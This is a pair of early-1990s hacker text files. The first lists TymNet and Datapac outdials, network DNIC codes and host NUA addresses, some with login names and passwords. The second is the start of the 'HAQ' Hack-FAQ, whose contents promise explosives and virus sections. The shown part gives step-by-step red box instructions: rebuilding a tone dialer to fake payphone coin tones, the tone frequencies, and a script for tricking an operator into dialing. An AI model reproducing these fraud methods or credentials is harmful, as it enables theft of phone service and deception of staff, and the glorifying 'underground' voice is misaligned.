|408 CA 03106 00 5379 Monterey |813 FL 03106 00 5518 Tampa |
|408 CA 03106 00 3655 Salinas |814 PA 03106 00 3338 Erie |
|408 CA 03106 00 6450 San Jose |814 PA 03106 00 3765 State College |
|408 CA 03106 00 3182 Santa Cruz |815 IL 03106 00 4144 Bradley |
|409 TX 03106 00 4497 Bryan |815 IL 03106 00 2514 Freeport |
|412 PA 03106 00 4153 Greensburg |815 IL 03106 00 6048 Rockford |
|412 PA 03106 00 7851 New Castle |817 TX 03106 00 9337 Arlington |
|412 PA 03106 00 7408 Pittsburgh |817 TX 03106 00 5990 Denton |
|413 MA 03106 00 3948 Springfield |817 TX 03106 00 9337 Fort Worth |
|414 WI 03106 00 8868 Appleton |817 TX 03106 00 9861 Killeen |
|414 WI 03106 00 9167 Brookfield |817 TX 03106 00 4687 Temple |
|414 WI 03106 00 3421 Green Bay |817 TX 03106 00 9859 Waco |
|414 WI 03106 00 9167 Milwaukee |817 TX 03106 00 6862 Wichita Falls |
|414 WI 03106 00 5966 Oshkosh |818 CA 03106 00 9204 Alhambra |
|415 CA 03106 00 7399 Fremont |818 CA 03106 00 2841 Burbank |
|415 CA 03106 00 8963 Oakland |818 CA 03106 00 9204 Pasadena |
|415 CA 03106 00 9202 Pleasanton |818 CA 03106 00 9206 Sherman Oaks |
|415 CA 03106 00 9182 Redwood City |901 TN 03106 00 3175 Jackson |
|415 CA 03106 00 9533 San Francisco |901 TN 03106 00 1551 Memphis |
|415 CA 03106 00 8094 San Rafael |904 FL 03106 00 5797 Jacksonville |
|415 CA 03106 00 3486 So. San Francisco|904 FL 03106 00 7220 Ocala |
|415 CA 03106 00 9202 Walnut Creek |904 FL 03106 00 1069 Ormond Beach |
|417 MO 03106 00 1928 Joplin |904 FL 03106 00 3193 Pensacola |
|419 OH 03106 00 6022 Mansfield |904 FL 03106 00 3192 Tallahassee |
|419 OH 03106 00 1190 Toledo |913 KS 03106 00 8615 Mission |
|501 AK 03106 00 7374 Fayetteville |913 KS 03106 00 3416 Salina |
|501 AK 03106 00 1297 Fort Smith |913 KS 03106 00 1672 Topeka |
|501 AK 03106 00 2725 Hot Springs |914 NY 03106 00 8861 Kingston |
|501 AK 03106 00 1069 Little Rock |914 NY 03106 00 1061 New City |
|502 KY 03106 00 3718 Frankfort |914 NY 03106 00 8571 White Plains |
|502 KY 03106 00 8678 Louisville |915 TX 03106 00 6980 Abilene |
|503 OR 03106 00 8603 Corvallis |915 TX 03106 00 210 El Paso |
|503 OR 03106 00 9857 Eugene |915 TX 03106 00 2326 Midland |
|503 OR 03106 00 9164 Portland |916 CA 03106 00 7801 Chico |
|503 OR 03106 00 3174 Salem |916 CA 03106 00 9179 Sacramento |
|504 LA 03106 00 6999 Baton Rouge |918 OK 03106 00 6605 Tulsa |
|504 LA 03106 00 9694 New Orleans |919 NC 03106 00 9986 Durham |
|504 LA 03106 00 1040 Slidell |919 NC 03106 00 1100 Fayetteville |
|505 NM 03106 00 661 Albuquerque |919 NC 03106 00 2964 Greensboro |
|505 NM 03106 00 6630 Las Cruces |919 NC 03106 00 9324 Rocky Mount |
|505 NM 03106 00 4604 Santa Fe |919 NC 03106 00 8739 Winston Salem |
+————————————–+————————————–+

Instructions for TymNet OutDials:
For example, if you wish to connect with the outdial port in Norfolk, Virginia
you would enter Username:6896;password. The following information would then
be displayed:

TYMNET ASYNC OUTDIAL 6986 (804) 857 NORFOLK , VA

>

At the “>” prompt, you may type “help” and receive the following screen:

>help
Set [Half] [Rxon] [Xon] [Even|Space] [Crdelay]
Half – sets half-duplex communications. Default is full-duplex.
Xon – sets flow control for data you send. Default is no xon.
Rxon – sets flow control for data you receive. Default is no rxon.
Even – sets even parity for data sent. Default is no parity.
Space – sets space parity for data sent. Default is no parity.
Crdelay – set printer carriage return delay. Default is no delay.
Bps [300|1200|2400]
Sets one of the baud rates indicated above. Default is 2400 bps.
Dial [Tone] [Pulse] {phone number}
Dials the requested phone number. Parameters are:
Tone – activates touch-tone dialing. Default is tone.
Pulse – activates pulse dialing.
Optional commas – provide a one second pause. Default is no pause.
Retry – Redials last phone number.
Logout – Exits Outdial.
Help or ? – Prints this screen.

NOTES: * Dialed number need not be preceded by “9”.
* In some locations, long-distance numbers must be preceded by “1”.

If, at this point, you wish to connect with a BBS whose phone number is,
for example, 555-1212, you would enter at the “>” prompt, the string
“d 5551212”. This causes the outdial modem to dial the number and connect
you at 2400 bps. If the host BBS only has 1200 bps modems, you would need
to first enter “bps 1200” at the “>” prompt. This sets the outdial modem
to call the host at 1200 bps rather than 2400 bps.

If the BBS is busy you will usually receive a “BUSY” indicator, at which
point you can type “r” to redial the number or “logout” to disconnect and
return to the “please log in” prompt. At the “please log in” prompt, you
may simply disconnect.

What does the connect string mean?

TYMNET ASYNC OUTDIAL 6986 (804) 857 NORFOLK , VA

6986 = Outdial Port #
(804) = Area Code
857 = Local exchange

TymNet permits you to make long distance calls from the outdial port.
You can determine if a BBS can be reached with a local call from an outdial
port by calling the operator in the destination city and asking if it is a
local call from the exchange. For example: Virginia Beach exchange 495 is
a local call from Norfolk exchange 857. If the BBS is outside the local
dialing area, you can still reach it by putting a “1” in front of the
number at the “>” prompt. Example: “d 15551212”. ALL LONG DISTANCE TOLL
CHARGES WILL BE CHARGED TO YOU!

ERROR MESSAGES AND PROBABLE CAUSES

The following are common error messages and some causes:

HOST OUT OF PORTS
All available outdial modems at the outdial city are in use.

BUSY
The host BBS’s phone lines are all busy.

CALL FAILED FOR UNKNOWN REASON
Usually indicates that a voice answered the phone call. Call the number by
voice to determine if it is still a viable number.

Can also be caused by low quality modem on the BBS or the BBS only
operating at 1200 bps. Try the “bps 1200” cure mentioned above.

Can also mean the BBS has all lines in use and the modem did not detect the busy signal.

MODEM TIMED ITSELF OUT – CALL CUSTOMER SERVICE
Modem malfunction or all BBS lines are busy. Please report this to TYMNET at 800-336-0149 immediately.

SUGGESTIONS

There are some methods you can use to improve the TymNet service from your end. The two most common complaints and the easiest to cure are file transfer speedups and interactive response speedups.

To improve file transfers:

Enter a control-V before typing in your TymNet username. Example: “STA000000;password”. This means hold down your control key and tap the “V” key before entering your Username. This opens up the bandwidth and improves transfer time.

To improve interactive response time:

Enter a control-I before your TymNet username. Example: “ STA000000;password”. Enter this the same way as the example above and the response time through the network will be faster. Perfect for chatting or e-mail, etc.

Members calling a 2400 Baud BBS using a 1200 Baud modem can improve file transfers and reduce error messages by putting control-X control-R before the Username when logging on to the network. This enables X-on, X-off flow control and prevents the BBS from sending data to you faster than you can accept it. Never use Control-X, Control-R together with
Control-V. It will really make a mess of things.

FILE TRANSFERS

Almost all BBS software requires that you transfer files at 8 data bits, No parity and 1 stop bit. If you are having trouble with file transfers this will usually be the problem. If you cannot access the network from your local number at 8-N-1 and must log on at 7-E-1, have your software switch to 8-N-1 after you have entered the “>d #######” command and before the BBS connects. Some BBS software doesn’t care what settings you use until you try to transfer a file. To prevent wasting valuable network time, it’s
best to assume that you need 8-N-1 and change to that setting prior to attempting a transfer. Please be sure that if you have stripped your high bits, you now turn them back on before transfers!

————————————————————

Datapac Outdials Accessible from Tymnet:
Dialing instructions are available at the site.

————————————————————
3020 6920 0902 ( 300 baud)(204, Manitoba,Winnipeg)
3020 6920 0901 (1200 baud)
3020 7210 0900 ( 300 baud)(306, Saskatchewan,Regina)
3020 7210 0901 (1200 baud)
3020 7110 0900 ( 300 baud)(306, Saskatchewan, Saskatoon)
3020 7110 0901 (1200 baud)
3020 6330 0900 ( 300 baud)(403, Alberta, Calgary)
3020 6630 0901 (1200 baud)
3020 5870 0900 ( 300 baud)(403, Alberta, Edmonton)
3020 5870 0901 (1200 baud)
3020 9160 0901 ( 300 baud) (416, Ontario, Toronto)
3020 9160 0902 (1200 baud)
3020 3850 0900 ( 300 baud) (416, Ontario, Hamilton)
3020 3850 0901 (1200 baud)
3020 7460 0900 ( 300 baud) (506, Brunswick, Saint John)
3020 7460 0901 (1200 baud)
3020 8270 0902 ( 300 baud) (514, Quebec, Montreal)
3020 8270 0903 (1200 baud)
3020 3560 0900 ( 300 baud) (519, Ontario, London)
3020 3560 0901 (1200 baud)
3020 2950 0900 ( 300 baud) (519, Ontario, Windsor)
3020 2950 0901 (1200 baud)
3020 3340 0900 ( 300 baud) (519, Ontario,Kitchener)
3020 3340 0901 (1200 baud)
3020 6710 0900 ( 300 baud) (604, British Col, Vancouver)
3020 6710 0901 (1200 baud)
3020 8570 0901 ( 300 baud) (613, Quebec, Ottawa)
3020 8570 0902 (1200 baud)
3020 3850 0900 ( 300 baud) (613, Ontario, Hamilton)
3020 3850 0901 (1200 baud)
3020 7810 0900 ( 300 baud) (709, Brunswick, St. John’s)
3020 7810 0901 (1200 baud)
3020 7610 1900 ( 300 baud) (902, Nova Scotia, Halifax)
3020 7610 1901 (1200 baud)
3020 3850 0900 ( 300 baud) (416, Ontario,Hamilton)
3020 3850 0901 (1200 baud)
3020 9190 0900 ( 300 baud) (???, ???????, Clarkson)
3020 9190 0901 (1200 baud)

Country and system DNIC codes, compiled by Digital-demon.
Note that many countries have multiple systems and so even multiple DNIC codes for the supposedly same system. The Network names may not be the correct ones, but they are the ones listed throughout the systems. I have come upon multiple names for the same systems in some cases and have decided on using one of the two or more. I apologize if this creates any confusion.

COUNTRY NETWORK DNIC
——- ——- —-
ANDORRA ANDORPAC 2945
ANTIGUA AGANET 3443
ARGENTINA ARPAC 7220
ARPAC 7222
AUSTRIA DATEX-P 2322
DATEX-P TTX 2323
RA 2329
AUSTRALIA AUSTPAC 5052
OTC DATA ACCESS 5053
AUSTPAC 5054
BAHAMAS BATELCO 3640
BAHRAIN BAHNET 4263
BARBADOS IDAS 3423
BELGIUM DCS 2062
DCS 2068
DCS 2069
BERMUDA BERMUDANET 3503
BRAZIL INTERDATA 7240
RENPAC 7241
RENPAC 7248
RENPAC 7249
CAMEROON CAMPAC 6242
CANADA DATAPAC 3020
GLOBEDAT 3025
INFOGRAM 3028
INFOSWITCH 3029
CAYMAN ISLANDS IDAS 3463
CHAD CHAD 6222
CHANNEL IS PSS 2342
CHILE ENTEL 7302
CHILE-PAC 7303
VTRNET 7305
ENTEL 7300
CHINA PTELCOM 4600
COLOMBIA COLDAPAQ 7322
COSTA RICA RACSAPAC 7120
RACSAPAC 7122
RACSAPAC 7128
RACSAPAC 7129
CURACAO UDTS 3400
CYPRUS CYTAPAC 2802
CYTAPAC 2807
CYTAPAC 2808
CYTAPAC 2809
DENMARK DATAPAK 2382
DATAPAK 2383
DJIBOUTI STIPAC 6382
DOMINICAN REP. UDTS-I 3701
EGYPT ARENTO 6020
FINLAND DATAPAK 2441
DATAPAK 2442
DIGIPAK 2443
FRANCE TRANSPAC 2080
NTI 2081
TRANSPAC 2089
TRANSPAC 9330
TRANSPAC 9331
TRANSPAC 9332
TRANSPAC 9333
TRANSPAC 9334
TRANSPAC 9335
TRANSPAC 9336
TRANSPAC 9337
TRANSPAC 9338
TRANSPAC 9339
FR ANTILLES TRANSPAC 2080
FR GUIANA TRANSPAC 2080
DOMPAC 7420
FR POLYNESIA TOMPAC 5470
GABON GABONPAC 6282
GERMANY F.R. DATEX-P 2624
DATEX-C 2627
GREECE HELPAK 2022
HELLASPAC 2023
GREENLAND KANUPAX 2901
GUADELOUPE DOMPAC 3400
GUAM LSDS-RCA 5350
PACNET 5351
GUATEMALA GUATEL 7040
GUATEL 7043
HONDURAS HONDUTEL 7080
HONDUTEL 7082
HONDUTEL 7089
HONG KONG INTELPAK 4542
DATAPAK 4545
INET HK 4546
HUNGARY DATEX-P 2160
DATEX-P 2161
ICELAND ICEPAK 2740
INDIA GPSS 4042
INDONESIA SKDP 5101
IRELAND EIRPAC 2721
EIRPAC 2724
ISRAEL ISRANET 4251
ITALY DARDO 2222
ITAPAC 2227
IVORY COAST SYTRANPAC 6122
JAMAICA JAMINTEL 3380
JAPAN GLOBALNET 4400
DDX 4401
NIS-NET 4406
VENUS-P 4408
VENUS-P 9955
VENUS-C 4409
KOREA REP DACOM-NET 4501
DNS 4503
KUWAIT BAHNET 4263
LEBANON SODETEL 4155
LUXEMBOURG LUXPAC 2704
LUXPAC 2709
MACAU MACAUPAC 4550
MALAYSIA MAYPAC 5021
MARTINIQUE DOMPAC 3400
MAURITIUS MAURIDATA 6170
MEXICO TELEPAC 3340
MOROCCO MOROCCO 6040
NETHERLANDS DATANET-1 2040
DATANET-1 2041
DABAS 2044
DATANET-1 2049
N. MARIANAS PACNET 5351
NEW CALEDONIA TOMPAC 5460
NEW ZEALAND PACNET 5301
NIGER NIGERPAC 6142
NORWAY DATAPAC TTX 2421
DATAPAK 2422
DATAPAC 2423
PANAMA INTELPAQ 7141
INTELPAQ 7142
PERU DICOTEL 7160
PHILIPPINES CAPWIRE 5150
CAPWIRE 5151
PGC 5152
GMCR 5154
ETPI 5156
PORTUGAL TELEPAC 2680
SABD 2682
PUERTO RICO UDTS 3300
UDTS 3301
QATAR DOHPAC 4271
REUNION (FR) TRANSPAC 2080
DOMPAC 6470
RWANDA RWANDA 6352
SAN MARINO X-NET 2922
SAUDI ARABIA ALWASEED 4201
SENEGAL SENPAC 6081
SINGAPORE TELEPAC 5252
TELEPAC 5258
ITELPAK 4542
SOUTH AFRICA SAPONET 6550
SAPONET 6551
SAPONET 6559
SOUTH KOREA DACOM-NET 4501
SPAIN TIDA 2141
IBERPAC 2145
SWEDEN DATAPAK TTX 2401
DATAPAK-1 2402
DATAPAK-2 2403
TELEPAK 2405
SWITZERLAND TELEPAC 2284
TELEPAC 2289
TAIWAN PACNET 4872
PACNET 4873
UDAS 4877
THAILAND THAIPAC 5200
IDAR 5201
TOGOLESE REP. TOGOPAC 6152
TORTOLA IDAS 3483
TRINIDAD DATANETT 3745
TEXTET 3740
TUNISIA RED25 6050
TURKEY TURPAC 2862
TURPAC 2863
TURKS&CAICOS IDAS 3763
U ARAB EMIRATES EMDAN 4241
EMDAN 4243
TEDAS 4310
URUGUAY URUPAC 7482
URUPAC 7489
USSR IASNET 2502
U.S. VIRGIN I UDTS 3320
U. KINGDOM IPSS-BTI 2341
PSS-BT 2342
MERCURY 2350
MERCURY 2351
HULL 2352
USA AUTONET 3126
COMPUSERVE 3132
FTCC 3124
ITT/UDTS 3103/310
MARKET 3136
RCA/LSDS 3113
TELENET 3110/312
TRT-DTAPAK 3119
TYMNET 3106
UNINET 3125
WUI-DBS 3104
WUTCO 3101
YUGOSLAVIA YUGOPAC 2201
ZIMBABWE ZIMNET 6482

—————————————-
ALTERNATIVE DATA
NUA: 234222400127
—————————————-
THE PAKR
NUA:234222400127
—————————————
BRIGHTON POLYTECHNIC
NUA: 234270500115
—————————————-
BRITISH LIBRARY
NUA:2342227900102 (Blaise-Line)
310600128800 (Blaise-Link)
————————————–
THE BRITISH LIBRARY
NUA: 234293765265
—————————————-
BRITISH MARITIME TECHNOLOGY (LIMITED)
Davy Bank Industrial Estate
Wallsend Research Station,
NUA: 234263200106
—————————————-
CABLE AND WIRELESS EASYLINK LTD
Mercury House
NUA: 234218400120
—————————————-
CAMBRIDGE UNIVERSITY COMPUTING SERVICE
NUA: 234222339399
—————————————-
CITY OF BIRMINGHAM POLYTECHNIC
NUA: 234221200114
—————————————-
CODUS LIMITED
NUA: 234274200103
—————————————-
COMNET GLOBAL COMMUNICATIONS LTD
NUA:234213401278
234213401277
—————————————
COMPU-MARK (UK) LTD
PSS NUA: 23421230024700
—————————————
COUNTING HOUSE COMPUTER SYSTEMS (1984) LTD
NUA: 2342284001440
—————————————-
DATABASE SYSTEMS (GB) LTD
NUA: 234258200103
—————————————
DATASOLVE LTD
NUA: 234213300124
—————————————-
DATEMA LIMITED
NUA: 234227200147
—————————————
DIALOG
NUA:23421230012011 (Dialnet)
23421230012013 (Dialmail)
3106900803 (Tymnet)
3106900061 (Tymnet)
3110415000200 (Telenet)
3110415000480 (Telenet)
3110213001700 (Telenet)
3110213002360 (Telenet)
312541500007 (Uninet)
312541500008 (Uninet)
3125415000027 (Uninet)
—————————————–
DILLON COMPUTING LIMITED
NUA: 234227230231
—————————————-
DRI EUROPE LTD
NUA:234219201105
3106900788
3106900218
—————————————-
DUN AND BRADSTREET
NUA: 234289500108
—————————————-
DYNATECH
NUA: 234270712221
—————————————-
EDINBURGH REGIONAL
NUA: 234231354354
—————————————
THE ELECTRONIC MAIL COMPANY LTD
NUA: 23428440010500
23428440010501
23428440010502
23428440010503
23428440010504
—————————————-
ENGINEERING INFORMATION COMPANY LTD
NUA 23421338012200
—————————————
ESSEX UNIVERSITY
NUA: 234220641141
————————————–
EXIS LIMITED
NUA: 234232500124
————————————–
FINSBURY DATA SERVICES LTD
NUA: 234219200101
————————————–,
NUA: 234274900101
————————————–
GSI (UK) LTD
NUA: 234227600139
————————————–
HATFIELD POLYTECHNIC
NUA: 234270712217
————————————–
HIGH LEVEL HARDWARE LIMITED
NUA: 23422350010999
————————————–
HUDDERSFIELD POLYTECHNIC
NUA: 234227400101
————————————–
INTERSCAN COMMUNICATIONS SYSTEMS LTD
NUA: 234275300124
————————————-
IRS DIALTECH
NUA: 234219201156
————————————-
ISTEL LIMITED
NUA: 234252724241
————————————-
KENT UNIVERSITY
NUA: 234222715151
————————————
KODA ONLINE
NUA: 234262200114 KODA
228468114080 EKOL (SWITZERLAND)
————————————
KOREAN BITNET
NUA: 4501201010100
—————————————
KOREAN PC-SERVE
NUA: 4501981
4501982
—————————————
LOCKHEED CORPORATION (INTERNATIONAL) S.A.
NUA: 234212300120
————————————–
LONGMAN CARTERMILL LIMITED
NUA: 234233400101
—————————————
MEAD DATA CENTRAL INTERNATIONAL
NUA: 234219200171
—————————————
MEJ ELECTRONICS LTD
NUA: 234275300131
————————————–
NEWCASTLE-UPON-TYNE UNIVERSITY
NUA: 234263259159
————————————–
NIXDORF COMPUTER
NUA: 234274200127
————————————-
OCLC EUROPE
NUA: 234221200145
————————————-
ONE TO ONE
NUA: 234212301281
————————————-
P&O EUROPEAN FERRIES
NUA: 234230415150
————————————-
PERGAMON ORBIT INFOLINE LTD
NUA:234284400162
3106009211 (Tymnet)
311070300141 (Telenet)
————————————-
PLESSEY CONTROLS LIMITED
NUA: 234219201002
————————————
PRAXIS SYSTEMS PLC
NUA: 234222500101
————————————-
SALFORD UNIVERSITY
NUA: 23426164321090
————————————-
SCICON LIMITED
NUA: 234290840111
————————————-
NUA: 234250600119
————————————
NUA: 234219200203
————————————-
SIA COMPUTER SERVICES
NUA: 234219200394
————————————-
THE SOFTWARE FORGE
NUA: 234273400156
————————————-
Bath University
NUA: 234222530303
————————————
THE STOCK EXCHANGE
NUA: 23421920010300
———————————–
STRATHCLYDE UNIVERSITY
NUA: 23424126010604
————————————
TELEFILE COMPUTER PRODUCTS LTD
NUA: 23427531732700
————————————
NUA: 23421230021001
————————————
T T INTERNATIONAL
NUA: 234218800168
————————————
UNI-NET
NUA: 655011101207 LOGIN: UNINET
PASS:NEW
————————————–
UNIVERSITY COLLEGE LONDON
NUA: 234219200300
————————————
UNIVERSITY OF WALES INSTITUTE OF SCIENCE & TECHNOLOGY
NUA: 234222236236
—————————————-
WEATHERBYS
NUA: 23426040010500
—————————————
WILTEK (UK) LTD
NUA: 234213300104
—————————————
WOLVERHAMPTON POLYTECHNIC
NUA: 234290200107
—————————————
BIX-LIKE SYSTEM
NUA: 45890010006
login: guest
—————————————
Prestel
NUA: 23411002002017
ID: 4444444444
pass:4444
A23411002002018
—————————————
MEP
NUA: 22846911003
login: cia0543
password: guest
—————————————
EMPAL BBS
NUA: 12210613300
————————————–
OAG
NUA: 311031200159
————————————–
PRIME
NUA: 302031400124
—————————————
QUICK BROWN FOX
NUA: 228462100990
—————————————
GENIE
NUA: 3136900
—————————————
CALVACOM (in french)
NUA: 208075111
login: NOUVEAU or NEW
—————————————
BAHAMIN TELEPHONE
NUA: 302079100900
—————————————-
MINITEL
NUA: 208075040390
—————————————-
TCICS
NUA: 44013612065
<3 returns>
login: guest or login: postcard
—————————————
CIS
NUA: 311020200202
3106*DCIS02
————————————–
HEBREW UNIVERSITY
NUA: 452120000113
—————————————-
CHAT SYSTEM
NUA: 2624521090832
—————————————

Well I think that is enough for the first installment of packet networks. For those of you confused on the use of any part of this text please contact me, Digital-demon, at THE MATRIX BBS 1-908-905-6691 or 1-201-905-6691.

Remember, the information presented within this text is for information purposes only, this author will NOT be held responsible for any actions by anyone other than himself. I hope it was as informational to you as it was to me when I was compiling this text.

Greets to my friends and allies in this dangerous world: Tal Meta, Midnite Raider, CyberSage, Rat Fink, Sir Hairy Legg/Leech, Cool One, Pulsar-Nova, Kludge, D_Flatline, and everyone else on QSD that has helped me in this endeavor.

By the way, anyone interested in finding tons of information on packet networks should check out the subs devoted to them on BIX and some of the larger networks, they were very informative.

“Death Rules the World, Let the DEVIL beware, and let GOD weep.” -Tensen Darquist

<*********************************************************>
< >
< >
< This Phile on >
< >
< Packet Networks >
< >
< Brought to you by >
< >
< Digital-demon >
< (C) DEC 29,1990 >
< >
< >
<*********************************************************>

The HAQ (Hack-FAQ Version 2.07) (June 11, 1994)

Jun 13, 1994 19:54 from Belisarius

_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***

+—————+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+—————+

“Knowledge is power” –Francis Bacon
“United we stand, divided we fall” –Aesop

=+=+=+=+=+=+=+=+=+= HACK-FAQ! Non-Copyright Notice =+=+=+=+=+=+=+=+=
= =
+ MatrixMage Publications. 1994 No rights reserved. +
= =
+ This file may be redistributed provided that the file and this +
= notice remain intact. This article may not under any =
+ circumstances be resold or redistributed for compensation of any +
= kind. Distribution of THE HACK-FAQ! is encouraged and promoted. =
+ +
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

<*> Edited by <*>

# Editor-in-Chief #
Belisarius < temporary loss of E-mail >
can be reached on ISCA, Shadow, SkyNET, Brinta and
Baltimore 2600 Meetings and other nameless locations.

# Asst. Editor (non communicado) #
Neurophire (on Shadow and N P on ISCA)

A MatrixMage Electronic Publication

Special Thanks to the Following Contributors:
Z Maestro RA of ISCA Underground>
DINO RA of Shadow Hack and Crack>
Artimage RA of SKYNET Underground>

Faunus Revolution Miska Informatik
Matrixx Amarand Crypto Steelyhart aBBa / PfA
Beelzebub Redbeard Squarewave
IO CyberSorceror Caustic
Doktor Nil Skipster Walrus
CPT Ozone Abort Kyoti
Carsenio Aero Phrack

AND NOW A WORD FROM YOUR EDITOR:

Throughout history mankind has been afraid of the unknown.
Before lightning could be scientifically explained it was blamed on
the anger of the gods. This belief in mysticism persisted throughout
the ages (and still does today). Later as man acquired simple herbal
and chemical knowledge, these men were revered as mages, users of
mystical arts derived from the old gods. But as organized religion
(i.e. Christianity especially Roman Catholicism) spread and came to
dominate society (became the powers that be), the mage was no longer
revered. The mage (who only sought to understand the world around
himself and make the world a better place) was persecuted, attacked
and driven underground by the church. But driving these mages
underground (out of society) did not stop their ideas from spreading
or them from continuing to work. The church labeled Copernicus as a
heretic and mage and only this century has the Roman Catholic church
accepted his principles (heliocentric universe) as fact.
So are ‘hackers’ the same today. We surf the nets seeking
knowledge and information (and hopefully understanding). Information
and understanding the meaning and import of the information are the
two greatest commodities and bases of power in the world today.
These things are easy to disseminate and gather in the electronic
world. The matrix (cyberspace/web/net [whichever term you choose])
is able to influence and control information faster and better than
ever before. This makes many afraid of the cyberculture (not to
mention a deep-seated techno-fear of many people, anything new and
technical is bad).
We are a new breed of mage; seeking knowledge, desiring
understanding, persecuted by the powers that be. This is why I have
started this publication. We are the MatrixMages! Our mission is
to learn and to pass on that knowledge.

-=> Belisarius <=-

*********************************************************************

What is 'Cyberpunk' and the Underground?

"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby. It gets stored, and copied, and sent out all
over the world, and people read it. It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace. Eventually somebody uses it, and I know that I have the
power to change the world. Somewhere, someplace, somebody changed
something using information I changed or created. I helped to
change the world."
--Unknown

That is the attitude of many of the people who, knowingly or not, are
members of this hyped/wired/cyber culture. Some who may read this
will see some of their undefined beliefs, hopes and feelings
reflected in the above quote. And, as the quote says, they will help
spread it. Somewhere, somehow, that quote will change the world.

But only if you work to change it. Remember that information and
knowledge are powerful commodities. He who has information cannot be
beaten. So above all the most important thing to do in the
"Underground" is to gather information. This means that you have to
work and put in some effort. You don't get something for nothing!
So work hard and together we can change the world!

Keep up with latest editions. (Sorry there haven't been many lately
but exams and not failing out took precedence!)

The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre, or any
contributor are not responsible for any consequences. You use this
information at your own risk.

*********************************************************************
CONTENTS
*********************************************************************

Sections
I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
II. Fake E-Mail (Fooling UUCP)
III. Social Engineering (Free sodas, Dumpster Diving, ATMs, Carding)
IV. The Big Bang (Making Weapons and Explosives)
V.
Infection (Virii, Trojans, Worms and other creepy crawlies) VI. NEWBIES READ THIS (Basic Hacking) VII. Screwing with the most widespread operating system on the net (UNIX / AIX Hacking) VIII. Screwing with the most secure operating system on the net (VAX/VMS Hacking) IX. Screwing with the most widespread operating system on PCs (MS-DOS Hacks) X. Finding out what that encrypted info is (Cracking programs) XI. How do I keep my info secure (PGP / Cryptology) XII. Chemistry 101 (explosive/pyrotechnic component prep) XIII. Fun things with solder, wires, and parts (Underground electronics) XIV. Watching television (cable, Pay-Per-View(PPV), scrambling) XV. Tuning in to what's on the radio waves (Radios and Scanning) Appendices A. FTP sites with useful info B. Interesting Gophers C. Informative USENET Newsgroups D. Publications and Zines E. Books F. Files and Papers G. Cataglogs H. PGP Keys ********************************************************************* ===================================================================== I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.) WHAT IS A RED BOX AND HOW DO I MAKE ONE? (from Doktor Nil) First note: a redbox is merely a device which plays the tone a payphone makes when you insert money. You just play it through the mike on the handset. You would think that the Phone Co. would mute the handset until you put a quarter in, and perhaps they are starting to build phones like that, but I have yet to see one. What you need: - Radio Shack 33 memory Pocket Tone Dialer - 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address below) - A solder gun. - Someone who can point out the crystal in the Tone Dialer. Instructions: 1) Open up the back of the tone dialer. Use screwdriver. 2) Locate crystal. It should be toward the right side. It will be smaller than the 6.5 MHz one you bought, but otherwise vaguely similar. 
It is basically capsule-shaped, with two electrodes coming out of the bottom which are soldered onto a circuit board. It's on the _left_ side, basically the third large crystal thing from the bottom, about 1.5 cm long, metallic, thin. 3) De-solder, and de-attach, crystal. Heat the solder that the crystal is seated in; remove crystal. 4) Attach 6.5 MHz crystal. It is easiest just to use the solder which is already there from the old crystal, that way there is less chance of you dropping hot solder somewhere it shouldn't be and losing everything. Heat first one drop of solder with the solder gun, and seat one electrode of the 6.4 MHz crystal in it, then do the same with the other. This is the easiest part to mess up, be careful that both drops of solder don't run together. 5) Put cover back on. you are done. How to use: Five presses of the "*" key will make the quarter sound. I think fewer presses make nickel/dime sounds, but I can't remember specifically. Here in Michigan, you can simply hold it up to the handset and press memory recall button 1 (where you have conveniently recorded five *'s -read the tone dialer directions on how to do this) and get a quarter credit, _IF_ you are calling LD. Keep making the tone to get additional credits. There is a maximum number of credits you can have at once. To make a local call this may not work. You need to first put in a real coin, then you can use the redbox for additional credits. There may be a way around this, however: Call the operator, and ask her to dial your number for you. She should do this without asking why, it is a regular service. If you need an excuse, say the "4" key isn't working, or something. She will ask you to insert your money. At this point use the redbox. If all goes well, she dials your number and you're in business. If she says "Will you do that one more time," or "Who is this," or any variations, hang up and walk away. 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT DO THESE CRYSTALS LOOK LIKE? In most cases, a rectangular metal can with two bare wires coming out of one end, and a number like "6.50000" stamped on one side. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL? (from Matrixx) 6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536 is the easiest to find (Radio Shack) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX? The crystals are available from Digi-Key. Call 1-800-DIGIKEY (1-800-344-4539) for more info. The part order number from DIGI-KEY is x-415-ND ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX? (from DINO) For a Radio Shack conversion red box: a nickel is one * and a quarter is 5 *'s Here are the freqs for a red box: $.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse with 33 millisecond pause between each pulse $.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66 millisecond pauses $.05 one pulse at the above freqs for 66 milliseconds! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO YOU KNOW THAT THE PHONE IS A COCOT? (from Faunus, Carsenio) If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT is a general term for Customer owned or "Bell-independent" phone companies. Sometimes they are more shabbily constructed than real 